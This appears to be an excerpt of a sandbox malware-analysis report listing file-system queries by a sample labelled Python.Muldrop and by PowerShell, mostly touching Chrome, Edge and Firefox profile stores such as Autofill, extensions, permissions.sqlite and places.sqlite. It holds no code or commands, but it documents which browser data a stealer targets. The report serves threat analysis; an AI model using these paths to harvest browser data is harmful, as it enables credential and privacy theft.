Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\21262822-6a68-4458-bd75-71865ae821a7 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\Desktop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
